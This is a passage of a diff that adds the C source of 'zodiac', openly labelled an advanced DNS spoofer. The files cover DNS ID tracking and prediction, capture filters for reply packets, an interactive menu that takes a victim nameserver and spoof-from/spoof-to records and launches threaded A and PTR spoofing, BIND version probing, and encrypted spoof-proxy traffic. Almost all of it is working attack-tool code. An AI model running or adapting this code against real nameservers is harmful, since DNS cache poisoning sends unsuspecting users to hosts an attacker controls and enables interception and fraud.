if (old == id_root) {
id_root = n_idq;
} else {
pthread_mutex_lock (&last->id_mutex);
last->next = n_idq;
pthread_mutex_unlock (&last->id_mutex);
}
pthread_mutex_unlock (&old->id_mutex);
id_free (old);
bc = 1; /* break if entry already exists */
/* else, when the end of the id queue is reached, without
* any matching entry, then just add our one to the end
*/
} else if (this->next == NULL) {
this->next = n_idq;
if (id_windows (0, this->id) == 1)
this->flags |= IDF_WINDUMB;
bc = 2; /* break when end of list is reached */
}
if (bc != 1) {
last = this;
this = this->next;
pthread_mutex_unlock (&last->id_mutex);
}
}
/* bc == 2 is already carried out
*/
}
pthread_mutex_unlock (&id_rmutex);
return;
}
/* id_speed
*
* fetch the id increasing speed.
*
* return the dns id increasing speed (in id's per 10 seconds) of the
* nameserver with ip `ip'.
* return 0 on failure.
*/
unsigned long int
id_speed (char *ip_a)
{
id_q *this; /* working pointer for queue */
struct in_addr ip_ad;
unsigned long int speed = 0;
pthread_mutex_lock (&id_rmutex);
ip_ad.s_addr = net_resolve (ip_a);
for (this = id_root; this != NULL; this = this->next) {
pthread_mutex_lock (&this->id_mutex);
if (memcmp (&this->ip, &ip_ad, sizeof (struct in_addr)) == 0) {
speed = this->id_speed;
}
pthread_mutex_unlock (&this->id_mutex);
}
pthread_mutex_unlock (&id_rmutex);
return (speed);
}
/* id_get
*
* return the last dns ID measured, with time pointed to by `tv'
* if `tv' is NULL, the timeval is not copied.
*
* return ID and copy timeval into *tv on success
* return 0 on failure
*/
u_short
id_get (char *ip, struct timeval *tv, unsigned long int *flags)
{
u_short id; /* id to return */
id_q *this; /* working pointer for queue */
int bc = 1; /* break condition */
struct in_addr ip_a;
/* lock queue mutex to sync all queue functions
*/
pthread_mutex_lock (&id_rmutex);
ip_a.s_addr = net_resolve (ip);
/* step through queue
*/
for (this = id_root; this != NULL && bc; this = this->next) {
pthread_mutex_lock (&this->id_mutex);
if (memcmp (&this->ip, &ip_a, sizeof (struct in_addr)) == 0) {
if (tv != NULL) {
memcpy (tv, &this->mtime, sizeof (struct timeval));
}
id = this->id;
*flags = this->flags;
bc = 0; /* break */
}
pthread_mutex_unlock (&this->id_mutex);
}
pthread_mutex_unlock (&id_rmutex);
return (bc == 0 ? (id) : 0);
}
/* id_qcleanup
*
* cleans up the whole id queue pointed to by `root', protected by `rm'.
*/
void
id_qcleanup (pthread_mutex_t *rm, id_q **root)
{
id_q *this;
pthread_mutex_lock (rm);
this = *root;
*root = NULL;
while (this != NULL) {
id_q *next;
/* lock, then destroy mutex
*/
pthread_mutex_lock (&this->id_mutex);
pthread_mutex_destroy (&this->id_mutex);
next = this->next;
id_free (this);
this = next;
}
pthread_mutex_unlock (rm);
return;
}

58
dns/zodiac/src/dnsid.h Normal file
View file

@ -0,0 +1,58 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns id queue handling header file
*/
#ifndef Z_DNSID_H
#define Z_DNSID_H
#include <pthread.h>
#include "output.h"
#define IDF_SEQ 0x0001 /* sequential id's */
#define IDF_WINDUMB 0x0002 /* windows dumb id's (just non-collision id's, starting at 0x0001) */
/* id_q
*
* linked list element that hold the last visible id of the nameserver with
* ip `ip'. `mtime' is the time the id was measured. `next' is the pointer
* to the next element of the linked list
*
* each element is protected by the `id_mutex' mutal exclusion variable
*/
typedef struct id_q {
pthread_mutex_t id_mutex; /* mutal exclusion over the structure */
struct in_addr ip; /* ip of the nameserver */
u_short id;
u_short id_guess; /* next guess range for id (= id + range) */
unsigned long int id_speed_c; /* how many times the speed has been counted */
unsigned long int id_speed; /* differential analysed dns id increasing
* speed in increases per 10 seconds
*/
unsigned long int flags; /* flags */
struct timeval mtime;
struct id_q *next;
} id_q;
void id_qprint (mscr *screen, WINDOW *win);
unsigned long int id_tdiff (struct timeval *mtime);
void id_free (id_q *tofree);
int id_seq (u_short new_id, u_short old_id, struct timeval *o_time, int idps);
int id_windows (u_short id_new, u_short id_old);
void id_add (struct in_addr ip, u_short id, struct timeval *mtime);
u_short id_get (char *ip_a, struct timeval *tv, unsigned long int *flags);
unsigned long int id_speed (char *ip_a);
void id_qcleanup (pthread_mutex_t *rm, id_q **root);
#ifndef DNSID_MAIN
extern id_q *id_root;
#endif
extern pthread_mutex_t id_rmutex;
#endif

622
dns/zodiac/src/dnsq.c Normal file
View file

@ -0,0 +1,622 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns queue routines
*/
#define DNSQ_MAIN
#include <stdlib.h>
#include <string.h>
#include <pthread.h>
#include <semaphore.h>
#include "common.h"
#include "dns.h"
#include "dnsq.h"
#include "packet.h"
/* a maximum of 256 filters should be used
* raise this on demand
*/
#define DQ_MAX 256
pthread_mutex_t dqf_mutex = PTHREAD_MUTEX_INITIALIZER; /* mutex over this array */
dq_filter *dqf[DQ_MAX]; /* filter descriptor array */
int dq_count = 0; /* total filter count */
/* dq_match
*
* compare two filters, `real' is a real filter from the filter table,
* `pseudo' is a pseudo filter, that is just used for this comparing
* purposes.
*
* return 1 if they match
* return 0 if they don't match
*/
int
dq_match (dq_filter *real, dq_filter *pseudo)
{
int n; /* temporary return value */
dns_hdr *dns; /* dns header pointer */
unsigned char *query_data; /* first query in dns packet */
/* compare the ip's, skipping INADDR_ANY records
*/
if (real->ip_src.s_addr != htonl (INADDR_ANY)) {
if (real->ip_src.s_addr != pseudo->ip_src.s_addr)
return (0);
}
if (real->ip_dst.s_addr != htonl (INADDR_ANY)) {
if (real->ip_dst.s_addr != pseudo->ip_dst.s_addr)
return (0);
}
/* compare the source/destination ports, skipping zero ports
*/
if (real->port_src != 0) {
if (real->port_src != pseudo->port_src)
return (0);
}
if (real->port_dst != 0) {
if (real->port_dst != pseudo->port_dst)
return (0);
}
/* finally, check the dns id range
*/
if (real->id_watch == 1) {
if (pseudo->id_start < real->id_start)
return (0);
if (pseudo->id_start > real->id_end)
return (0);
}
/* query comparison
*/
if (real->query != NULL && pseudo->dns_packet != NULL) {
dns = (dns_hdr *) pseudo->dns_packet;
if (ntohs (dns->qdcount) >= 1) {
char label[256];
/* decode query label from incoming packet and then compare
* with given query
*/
query_data = pseudo->dns_packet + sizeof (dns_hdr);
memset (label, '\0', sizeof (label));
n = dns_dcd_label (pseudo->dns_packet, &query_data, label, sizeof (label) - 1, 5);
/* decoding failed
*/
if (n == 1)
return (0);
xstrupper (label);
if (strcmp (label, real->query) != 0)
return (0);
} else {
/* no query in the packet, but required by filter
*/
return (0);
}
}
/* all aspects to check matched
*/
return (1);
}
/* dq_activate
*
* activate any dq_filter_wait () that may wait for filter activity from
* the filter pointed to by `filt'.
* assume that the calling function holds filt->dq_mutex.
*
* return in any case
*/
void
dq_activate (dq_filter *filt)
{
sem_post (&filt->dq_sem);
return;
}
/* dq_handle
*
* check wether an incoming dns packet matches the filter table, then
* take the appropiate actions.
*
* return in any case
*/
void
dq_handle (ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned int plen)
{
int slot, n; /* temporary slot counter */
dq_filter *tflt; /* temporary filter for matching purposes */
/* create new pseudo filter
*/
tflt = xcalloc (1, sizeof (dq_filter));
tflt->ip_src = ip->ip_src;
tflt->ip_dst = ip->ip_dst;
tflt->port_src = htons (udp->uh_sport);
tflt->port_dst = htons (udp->uh_dport);
tflt->id_watch = 0;
tflt->id_start = htons (dns->id);
tflt->id_end = 0;
tflt->dns_packet = (unsigned char *) dns;
/* go through all slots
*/
pthread_mutex_lock (&dqf_mutex);
n = dq_count;
for (slot = 0; n > 0 && slot < DQ_MAX; slot++) {
if (dqf[slot] == NULL)
continue;
n--;
/* check wether they match, then activate threads that may listen
* for activity on the descriptor
*/
if (dq_match (dqf[slot], tflt) == 1) {
pthread_mutex_lock (&dqf[slot]->dq_mutex);
dqf[slot]->dq_sem_real = 1;
dq_p_append (dqf[slot], (unsigned char *) ip, plen);
dq_activate (dqf[slot]);
pthread_mutex_unlock (&dqf[slot]->dq_mutex);
}
}
pthread_mutex_unlock (&dqf_mutex);
/* free the pseudo filter
*/
free (tflt);
return;
}
/* dq_p_get
*
* get the first packet stored in queue on filter associated with `desc'
*
* return a pointer to the unlinked first packet
* return NULL on failure
*/
dq_packet *
dq_p_get (int desc)
{
dq_filter *df;
dq_packet *this;
pthread_mutex_lock (&dqf_mutex);
df = dqf[desc];
if (df != NULL) {
pthread_mutex_lock (&df->dq_mutex);
if (df->p_root == NULL)
return (NULL);
this = df->p_root;
df->p_root = this->next;
pthread_mutex_unlock (&df->dq_mutex);
}
pthread_mutex_unlock (&dqf_mutex);
return (this);
}
/* dq_p_append
*
* append a packet to a filter queue, where `packet' contains
* data consisting out of the ip header, udp header, dns header and dns data
*/
void
dq_p_append (dq_filter *df, unsigned char *packet, unsigned int packetlength)
{
dq_packet *this, *last;
this = df->p_root;
/* first packet
*/
if (this == NULL) {
df->p_root = xcalloc (1, sizeof (dq_packet));
this = df->p_root;
} else {
/* append to the list
*/
while (this != NULL) {
last = this;
this = this->next;
}
last->next = xcalloc (1, sizeof (dq_packet));
this = last->next;
}
this->next = NULL;
this->packet = xcalloc (1, packetlength);
memcpy (this->packet, packet, packetlength);
this->plen = packetlength;
return;
}
/* dq_findslot
*
* find a free slot in the array `df', with a maximum array size of `dqmax'
*
* return -1 if no slot is free
* return slot if slot is found
*/
int
dq_findslot (dq_filter *df[], int dq_max)
{
int n;
for (n = 0; n < dq_max; n++) {
if (df[n] == NULL)
return (n);
}
return (-1);
}
/* dq_filter_install
*
* return -1 on failure
* return >=0 as a dq_filter descriptor
*/
int
dq_filter_install (struct in_addr ip_src, struct in_addr ip_dst,
unsigned short int port_src, unsigned short int port_dst,
int id_watch, u_short id_start, u_short id_end, char *query)
{
dq_filter *nf;
int slot; /* free slot */
pthread_mutex_lock (&dqf_mutex);
slot = dq_findslot (dqf, DQ_MAX);
if (slot == -1)
return (-1);
nf = xcalloc (1, sizeof (dq_filter));
/* initialize thread variables
*/
pthread_mutex_init (&nf->dq_mutex, NULL);
pthread_mutex_lock (&nf->dq_mutex);
sem_init (&nf->dq_sem, 0, 0);
/* set up filter data
*/
nf->dq_sem_real = 0;
nf->dq_desc = slot; /* set descriptor */
nf->ip_src = ip_src;
nf->ip_dst = ip_dst;
nf->port_src = port_src;
nf->port_dst = port_dst;
nf->id_watch = id_watch;
nf->id_start = id_start;
nf->id_end = id_end;
nf->dns_packet = NULL;
nf->p_root = NULL;
if (query == NULL) {
nf->query = NULL;
} else {
nf->query = xstrdup (query);
xstrupper (nf->query);
}
dqf[slot] = nf;
dq_count++;
pthread_mutex_unlock (&nf->dq_mutex);
pthread_mutex_unlock (&dqf_mutex);
return (slot);
}
/* dq_filter_uninstall
*
* return 0 on success
* return 1 on failure
*/
int
dq_filter_uninstall (int dq_desc)
{
dq_filter *this;
int n;
pthread_mutex_lock (&dqf_mutex);
for (n = 0; n < DQ_MAX; n++) {
if (dqf[n] != NULL) {
pthread_mutex_lock (&dqf[n]->dq_mutex);
/* if filter matches, uninstall it
*/
if (dqf[n]->dq_desc == dq_desc) {
this = dqf[n];
dqf[n] = NULL;
/* kill ALL waiting routines
*/
while (this->dq_wait_count > 0) {
/* no real activation
*/
this->dq_sem_real = 0;
sem_post (&this->dq_sem);
/* and let one waiter die
*/
pthread_mutex_unlock (&dqf[n]->dq_mutex);
pthread_mutex_lock (&dqf[n]->dq_mutex);
}
dq_p_free_all (this);
dq_filter_free (this);
dq_count--;
/* `dq_desc' should be unique, so we don't care
*/
pthread_mutex_unlock (&dqf_mutex);
return (0);
}
pthread_mutex_unlock (&dqf[n]->dq_mutex);
}
}
pthread_mutex_unlock (&dqf_mutex);
return (1);
}
/* dq_p_free_all
*
* free's all resisting packets within one filter
*
* return in any case
*/
void
dq_p_free_all (dq_filter *dq)
{
dq_packet *this, *last;
for (this = dq->p_root; this != NULL;) {
last = this;
this = this->next;
dq_p_free (last);
}
return;
}
/* dq_p_free
*
* free the packet pointed to by `dqp'
*
* return in any case
*/
void
dq_p_free (dq_packet *dqp)
{
if (dqp != NULL) {
if (dqp->packet != NULL)
free (dqp->packet);
free (dqp);
}
return;
}
/* dq_filter_free
*
* return in any case
*/
void
dq_filter_free (dq_filter *dq)
{
if (dq == NULL)
return;
pthread_mutex_destroy (&dq->dq_mutex);
sem_destroy (&dq->dq_sem);
if (dq->query != NULL)
free (dq->query);
free (dq);
return;
}
/* dq_filter_wait
*
* 'select' for filter descriptors.
* wait a maximum of time defined in `tv' to get packets for filter defined
* by `dq_desc'. if `tv' is { 0, 0 }, don't block, if `tv' is NULL, wait
* indefinitly.
*
* return 1 if packet was caught
* return 0 on timeout
*/
int
dq_filter_wait (int dq_desc, struct timeval *tv)
{
int rval = 0; /* return value */
int n = 0; /* temporary return value */
/* first, register us as a filter waiter
*/
pthread_mutex_lock (&dqf[dq_desc]->dq_mutex);
dqf[dq_desc]->dq_wait_count++;
pthread_mutex_unlock (&dqf[dq_desc]->dq_mutex);
/* if a timeout is required, fire up another subthread, that just
* will post the semaphore after a given timeout, but set dq_sem_real
* to zero, to tell us that it's just a timeout semaphore.
*
* in the other case, if a real packet intrudes, dq_activate will post
* the semaphore AND will notify us through dq_sem_real = 1 that it's
* a real packet.
*
* in the worst case, the filter is being uninstalled, and dq_sem_real
* will be "2", that means we should just return as if no packet has
* been caught.
*
* if no timeout is used it's just a sem_wait.
*/
/* check wether we have to wait indefinite
*/
if (tv != NULL) {
/* check wether it is a timeouting wait request
*/
if (tv->tv_sec != 0 || tv->tv_usec != 0) {
pthread_t tout_tid; /* timeout thread id */
dqtim_val *paa = xcalloc (1, sizeof (dqtim_val));
/* build up a pseudo structure, just for parameter passing
*/
paa->tv.tv_sec = tv->tv_sec;
paa->tv.tv_usec = tv->tv_usec;
paa->df = dqf[dq_desc];
/* start a timeouter thread
*/
n = pthread_create (&tout_tid, NULL, (void *) dq_timer, (void *) paa);
if (n != -1) {
sem_wait (&dqf[dq_desc]->dq_sem);
/* destroy the timeouting thread on real packet
* added pthread_join () call - 990925.
*/
if (dqf[dq_desc]->dq_sem_real != 0) {
pthread_cancel (tout_tid);
}
pthread_join (tout_tid, NULL);
}
/* clean the mess up and set the return value
*/
free (paa);
rval = dqf[dq_desc]->dq_sem_real;
} else {
/* non blocking check
*/
n = sem_trywait (&dqf[dq_desc]->dq_sem);
if (n == 0)
rval = 1;
}
} else {
/* wait indefinitly
*/
n = sem_wait (&dqf[dq_desc]->dq_sem);
if (n == 0) {
pthread_mutex_lock (&dqf[dq_desc]->dq_mutex);
n = dqf[dq_desc]->dq_sem_real;
if (n == 1)
rval = 1;
pthread_mutex_unlock (&dqf[dq_desc]->dq_mutex);
}
}
/* decrease the listeners count
*/
pthread_mutex_lock (&dqf[dq_desc]->dq_mutex);
dqf[dq_desc]->dq_wait_count--;
pthread_mutex_unlock (&dqf[dq_desc]->dq_mutex);
return (rval);
}
/* dq_timer
*
* timeout thread, that will just raise a semaphore after a given timeout
* the thread has to be cancelled if the timeout is not necessary anymore.
*
* return nothing (threaded)
*/
void *
dq_timer (dqtim_val *paa)
{
unsigned long long usec; /* microseconds to sleep */
/* added to allow immediate interruption.
* -smiler 990925
*/
pthread_setcancelstate (PTHREAD_CANCEL_ENABLE, NULL);
pthread_setcanceltype (PTHREAD_CANCEL_ASYNCHRONOUS, NULL);
/* calculate time to sleep, then sleep until either timeout
* or interruption
*/
usec = (paa->tv.tv_sec * 1000000) + paa->tv.tv_usec;
usleep (usec);
/* we survived, now be faster then the race condition ;-D
*/
paa->df->dq_sem_real = 0; /*0 = just a timeout*/
sem_post (&paa->df->dq_sem); /* post semaphore */
return (NULL);
}

185
dns/zodiac/src/dnsq.h Normal file
View file

@ -0,0 +1,185 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns queue routines include file
*/
#ifndef Z_DNSQ_H
#define Z_DNSQ_H
#include <sys/time.h>
#include <unistd.h>
#include <pthread.h>
#include <semaphore.h>
#include "packet.h"
/* a maximum of 256 filters should be used
* raise this on demand
*/
#define DQ_MAX 256
/* dq_packet structure
*
* linked list,
* used to pass an incoming matched packet to the waiting thread
*/
typedef struct dq_packet {
struct dq_packet *next; /* next in the linked list */
unsigned char *packet; /* IP header starts */
unsigned int plen; /* packet length (iphdr + udphdr + dnshdr + dnsdata) */
} dq_packet;
/* dq_filter structure
*
* this is a internal filter structure, which defines a complete dns packet
* filter. a maximum of DQ_MAX filters may be active simultanously.
*/
typedef struct dq_filter {
pthread_mutex_t dq_mutex; /* mutex over this structure */
int dq_desc; /* dq_filter descriptor */
sem_t dq_sem; /* semaphore for this filter */
int dq_sem_real; /* real semaphore or just timeout one */
int dq_wait_count; /* counts the waiting threads on this filter */
struct in_addr ip_src; /* ip or INADDR_ANY */
struct in_addr ip_dst; /* ip or INADDR_ANY */
unsigned short int port_src; /* source port or zero */
unsigned short int port_dst; /* destination port or zero */
int id_watch; /* 0 = don't care, 1 = watch */
u_short id_start; /* dns id range start */
u_short id_end; /* end */
unsigned char *query; /* NULL or query domain (uncompressed, dotted) */
unsigned char *dns_packet; /* start of a dns packet */
dq_packet *p_root; /* packet list root */
} dq_filter;
/* dqtim_val structure
*
* passing structure for the timeouting thread
*/
typedef struct dqtim_val {
struct timeval tv; /* timeout interval */
dq_filter *df; /* filter to trigger */
} dqtim_val;
/* dq_handle
*
* check wether an incoming dns packet matches the filter table, then
* take the appropiate actions.
*
* return in any case
*/
void dq_handle (ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned int plen);
/* dq_p_get
*
* get the first packet stored in queue on filter associated with `desc'
*
* return a pointer to the unlinked first packet
* return NULL on failure
*/
dq_packet *dq_p_get (int desc);
/* dq_p_append
*
* append a packet to a filter queue, where `packet' contains
* data consisting out of the ip header, udp header, dns header and dns data
*/
void dq_p_append (dq_filter *df, unsigned char *packet, unsigned int packetlength);
/* dq_p_free_all
*
* free's all resisting packets within one filter
*
* return in any case
*/
void dq_p_free_all (dq_filter *dq);
/* dq_p_free
*
* free the packet pointed to by `dqp'
*
* return in any case
*/
void dq_p_free (dq_packet *dqp);
/* dq_filter_install
*
* install a dns packet filter, which will filter any datagrams that may come
* from `ip_src' and going to `ip_dst' from port `port_src' to port `port_dst'.
* if `id_watch' is non-zero keep also watch of the dns id of the packet, which
* has to be in between of `id_start' and `id_end', `query' is the dns query
* content which has to be in the packet, or NULL if it doesn't have to match.
*
* return -1 on failure
* return >=0 as a dq_filter descriptor
*/
int dq_filter_install (struct in_addr ip_src, struct in_addr ip_dst,
unsigned short int port_src, unsigned short int port_dst,
int id_watch, u_short id_start, u_short id_end, char *query);
/* dq_filter_uninstall
*
* remove a dns packet filter with the descriptor `dq_desc' from the filter
* queue.
*
* return 0 on success
* return 1 on failure
*/
int dq_filter_uninstall (int dq_desc);
/* dq_filter_wait
*
* 'select' for filter descriptors.
* wait a maximum of time defined in `tv' to get packets for filter defined
* by `dq_desc'. if `tv' is { 0, 0 }, don't block, if `tv' is NULL, wait
* indefinitly.
*
* return 1 if packet was caught
* return 0 on timeout
*/
int dq_filter_wait (int dq_desc, struct timeval *tv);
/* dq_timer
*
* helper function for timeouting the filter_wait function
*/
void *dq_timer (dqtim_val *paa);
/* internal functions
*/
int dq_match (dq_filter *real, dq_filter *pseudo);
int dq_findslot (dq_filter *df[], int dq_max);
void dq_filter_free (dq_filter *dq);
#endif

384
dns/zodiac/src/gui.c Normal file
View file

@ -0,0 +1,384 @@
/* zodiac - advanced dns spoofer
*
* by team teso
*
* this routines are most likely the crappiest routines in the whole zodiac
* source tree. if i have a lot of time i'll to a elite rewrite of this crap.
* -sc
*/
#include <stdlib.h>
#include <string.h>
#include <ncurses.h>
#include "common.h"
#include "dns.h"
#include "dns-spoof.h"
#include "dns-tag.h"
#include "dns-tools.h"
#include "gui.h"
#include "output.h"
#include "zodiac.h"
#include "dns-build.h"
char *input = NULL;
char *prompt = NULL;
void
menu_prompt (char *pr)
{
if (prompt == NULL) {
prompt = xstrdup (pr);
} else {
free (prompt);
prompt = xstrdup (pr);
}
m_printf (ms, ms->winsh, "%s", prompt);
return;
}
void
menu_clear (void)
{
if (input != NULL)
free (input);
input = NULL;
}
void
menu_tool (void)
{
}
void
menu_dos (void)
{
}
void
menu_spoof_jizz (void)
{
char *ns,
*local_domain,
*local_dns_ip,
*spoof_from,
*spoof_to;
spoof_base *base;
ns = menu_input ();
local_domain = menu_input ();
local_dns_ip = menu_input ();
spoof_from = menu_input ();
spoof_to = menu_input ();
base = spoof_jizz_new (ns, local_domain, local_dns_ip,
spoof_from, spoof_to);
spoof_do_threaded (base);
return;
}
void
menu_spoof_local (void)
{
char *sp_type,
*victim,
*from, *to,
*local_dns, *local_dns_ip;
int spoof_type;
spoof_base *base;
victim = menu_input ();
sp_type = menu_input ();
if (strcasecmp (sp_type, "a") == 0) {
spoof_type = T_A;
} else if (strcasecmp (sp_type, "ptr") == 0) {
spoof_type = T_PTR;
} else {
m_printf (ms, ms->winsh, "#! invalid spoof type\n");
menu_clear ();
return;
}
free (sp_type);
from = menu_input ();
to = menu_input ();
local_dns = menu_input ();
local_dns_ip = menu_input ();
base = spoof_local_new (victim, from, to, local_dns, local_dns_ip,
spoof_type);
spoof_do_threaded (base);
return;
}
void
menu_spoof_dnsid (void)
{
char *ns,
*domain,
*spoof_from,
*spoof_to,
*spoof_ptr,
*sp_type;
spoof_base *base;
int n = 0,
spoof_type;
menu_prompt ("[victim nameserver] > ");
ns = menu_input ();
menu_prompt ("[your domain] > ");
domain = menu_input ();
base = spoof_id_new (ns, domain);
menu_prompt ("[spoof from] > ");
spoof_from = menu_input ();
menu_prompt ("[spoof to] > ");
spoof_to = menu_input ();
if (inet_addr (spoof_to) == -1) {
menu_prompt ("bad ip\n");
menu_clear ();
return;
}
menu_prompt ("[spoof type - a,ptr,both] ");
sp_type = menu_input ();
if (strcasecmp (sp_type, "a") == 0) {
spoof_type = T_A;
} else if (strcasecmp (sp_type, "ptr") == 0) {
spoof_type = T_PTR;
} else if (strcasecmp (sp_type, "both") == 0) {
spoof_type = T_PTR + T_A;
} else {
m_printf (ms, ms->winsh, "#! invalid spoof type\n");
menu_clear ();
return;
}
free (sp_type);
if (spoof_type == T_A) {
n += spoof_id_add (base, T_A, spoof_from, spoof_to, NULL);
} else if (spoof_type == T_PTR) {
spoof_ptr = dns_build_ptr (spoof_to);
n += spoof_id_add (base, T_PTR, spoof_ptr, spoof_from, NULL);
} else {
spoof_ptr = dns_build_ptr (spoof_to);
n += spoof_id_add (base, T_PTR, spoof_ptr, spoof_from, NULL);
n += spoof_id_add (base, T_A, xstrdup (spoof_from), spoof_to, NULL);
}
if (n < 0) {
menu_prompt ("error\n");
menu_clear ();
spoof_destroy (base);
return;
}
spoof_do_threaded (base);
return;
}
void
menu_set (void)
{
char *basecmd;
menu_prompt ("[set] > ");
basecmd = menu_input ();
if (strcasecmp (basecmd, "zsp") == 0) {
char *tmp;
tmp = zodiac_spoof_proxy;
zodiac_spoof_proxy = NULL;
if (tmp != NULL)
free (tmp);
tmp = zodiac_spoof_proxy_key;
zodiac_spoof_proxy_key = NULL;
if (tmp != NULL)
free (tmp);
zodiac_spoof_proxy = menu_input ();
tmp = menu_input ();
sscanf (tmp, "%hu", &zodiac_spoof_proxy_port);
free (tmp);
tmp = menu_input ();
zodiac_spoof_proxy_key = xcalloc (1, strlen (tmp) + 1);
sscanf (tmp, "%[^\n]\n", zodiac_spoof_proxy_key);
free (tmp);
} else if (strcasecmp (basecmd, "showpackets") == 0) {
char *tmp = menu_input ();
sscanf (tmp, "%d", &dns_print_own_packets);
free (tmp);
} else {
menu_clear ();
}
free (basecmd);
return;
}
void
menu_ns (void)
{
char *basecmd;
menu_prompt ("[ns] > ");
basecmd = menu_input ();
if (strcasecmp (basecmd, "version") == 0) {
char *ip;
char *version_reply;
ip = menu_input ();
version_reply = dt_bind_version (ip);
m_printf (ms, ms->winsh, "%s: %s\n", ip, version_reply);
free (ip);
free (version_reply);
} else {
menu_clear ();
}
free (basecmd);
return;
}
void
menu_test (void)
{
char *basecmd;
menu_prompt ("[test] > ");
basecmd = menu_input ();
if (strcasecmp (basecmd, "spoof") == 0) {
char *ns,
*ourdomain;
int spoofing = 0;
ns = menu_input ();
ourdomain = menu_input ();
spoofing = spoof_ip_check (ns, ourdomain);
m_printf (ms, ms->winsh, "[zod] send capabilities = %s\n",
spoofing == 1 ? "spoofing allowed" :
(spoofing == -1 ? "not even unspoofed packets" :
"only unspoofed packets"));
free (ns);
free (ourdomain);
}
free (basecmd);
return;
}
void
menu_spoof (void)
{
char *basecmd;
menu_prompt ("[spoof] > ");
basecmd = menu_input ();
if (strcasecmp (basecmd, "local") == 0) {
menu_spoof_local ();
} else if (strcasecmp (basecmd, "jizz") == 0) {
menu_spoof_jizz ();
} else if (strcasecmp (basecmd, "id") == 0) {
menu_spoof_dnsid ();
} else {
m_printf (ms, ms->winsh, "#! not a valid spoof subcommand\n");
menu_clear ();
}
return;
}
void
menu_handle (void)
{
char *basecmd;
m_root:
menu_prompt ("[] > ");
do {
basecmd = menu_input ();
if (strlen (basecmd) == 0)
goto m_root;
/* lame code here
*/
if (strcasecmp (basecmd, "quit") == 0) {
return;
} else if (strcasecmp (basecmd, "help") == 0) {
m_printf (ms, ms->winsh, "quit quit zodiac\n");
m_printf (ms, ms->winsh, "spoof id dns id spoofing\n");
m_printf (ms, ms->winsh, "ns version <host> bind version request\n");
m_printf (ms, ms->winsh, "set zsp <host> <port> <key> set spoof proxy parameters\n");
m_printf (ms, ms->winsh, "set showpackets <1|0> set show-own-packets flag\n");
m_printf (ms, ms->winsh, "test spoof <nameserver> <ourdomain> test whether we can ip spoof\n");
} else if (strcasecmp (basecmd, "spoof") == 0) {
menu_spoof ();
} else if (strcasecmp (basecmd, "ns") == 0) {
menu_ns ();
} else if (strcasecmp (basecmd, "test") == 0) {
menu_test ();
} else if (strcasecmp (basecmd, "dos") == 0) {
// menu_dos ();
} else if (strcasecmp (basecmd, "set") == 0) {
menu_set ();
} else {
m_printf (ms, ms->winsh, "#! wrong command, see \"help\"\n");
goto m_root;
}
free (basecmd);
basecmd = NULL;
} while (1);
}
char *
menu_input (void)
{
char *p;
int cl;
if (input == NULL) {
input = xcalloc (1, 1024);
wscanw (ms->winsh, "%1023c", input);
}
cl = strcspn (input, " \t\n\r");
p = xcalloc (1, cl + 1);
memcpy (p, input, cl);
if (strlen (input + cl + 1) > 0) {
int n = strlen (input + cl + 1);
memmove (input, input + cl + 1, strlen (input + cl + 1));
memset (input + n, '\0', cl);
} else {
free (input);
input = NULL;
}
return (p);
}

21
dns/zodiac/src/gui.h Normal file
View file

@ -0,0 +1,21 @@
/* zodiac - advanced dns spoofer
*
* by team teso
*/
#ifndef _Z_GUI_H
#define _Z_GUI_H
#include "dns-spoof-int.h"
void menu_prompt (char *add);
void menu_clear (void);
void menu_test (void);
void menu_set (void);
void menu_spoof (void);
void menu_handle (void);
char *menu_input (void);
#endif

272
dns/zodiac/src/io-udp.c Normal file
View file

@ -0,0 +1,272 @@
/* udp io routines
*
* by scut
*
* udp packet routines include file
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <libnet.h>
#include "cipher-blowfish.h"
#include "common.h"
#include "io-udp.h"
#include "network.h"
void
udp_listen_free (udp_listen *ul)
{
if (ul == NULL)
return;
if (ul->socket != 0)
close (ul->socket);
free (ul);
return;
}
udp_listen *
udp_setup (char *ip, unsigned short int port)
{
int n; /* temporary return value */
udp_listen *new = xcalloc (1, sizeof (udp_listen));
new->addr_serv.sin_family = AF_INET;
new->addr_serv.sin_port = htons (port);
if (ip == NULL) {
new->addr_serv.sin_addr.s_addr = htonl (INADDR_ANY);
} else {
new->addr_serv.sin_addr.s_addr = net_resolve (ip);
if (new->addr_serv.sin_addr.s_addr == 0)
goto u_fail;
}
new->port = port;
/* aquire udp socket
*/
new->socket = socket (AF_INET, SOCK_DGRAM, 0);
if (new->socket == -1)
goto u_fail;
n = bind (new->socket, (struct sockaddr *) &new->addr_serv, sizeof (new->addr_serv));
if (n == -1)
goto u_fail;
return (new);
u_fail:
if (new->socket != 0)
close (new->socket);
free (new);
return (NULL);
}
void
udp_rcv_free (udp_rcv *ur)
{
if (ur == NULL)
return;
if (ur->udp_data != NULL)
free (ur->udp_data);
free (ur);
return;
}
udp_rcv *
udp_receive (udp_listen *ul)
{
int n; /* temporary return value */
udp_rcv *u_rcv; /* new received udp datagram */
unsigned char *u_packet;
socklen_t len;
if (ul == NULL)
return (NULL);
u_rcv = xcalloc (1, sizeof (udp_rcv));
u_packet = xcalloc (1, IP_MAXPACKET);
while (1) {
len = sizeof (struct sockaddr_in);
n = recvfrom (ul->socket, u_packet, IP_MAXPACKET, 0,
&u_rcv->addr_client, &len);
if (n == -1)
goto ur_fail;
/* save time the packet was received and copy the received data
*/
gettimeofday (&u_rcv->udp_time, NULL);
xrealloc (u_packet, n);
u_rcv->udp_data = u_packet;
u_rcv->udp_len = n;
ul->count++;
return (u_rcv);
}
ur_fail:
free (u_rcv);
free (u_packet);
return (NULL);
}
void
udp_write (char *ip, unsigned short int port, unsigned char *data,
size_t data_len, char *key)
{
int udp_sockfd;
struct sockaddr_in udp_to;
unsigned char *data_enc;
socklen_t len;
/* do the encryption
*/
if (key != NULL) {
unsigned char *p_ofs,
*dt;
dt = xcalloc (1, data_len + 2);
memcpy (dt + 2, data, data_len);
p_ofs = dt;
PUTSHORT (data_len, p_ofs);
data_enc = bf_encipher (key, dt, data_len + 2, &len);
free (dt);
} else {
data_enc = xcalloc (1, data_len);
memcpy (data_enc, data, data_len);
len = data_len;
}
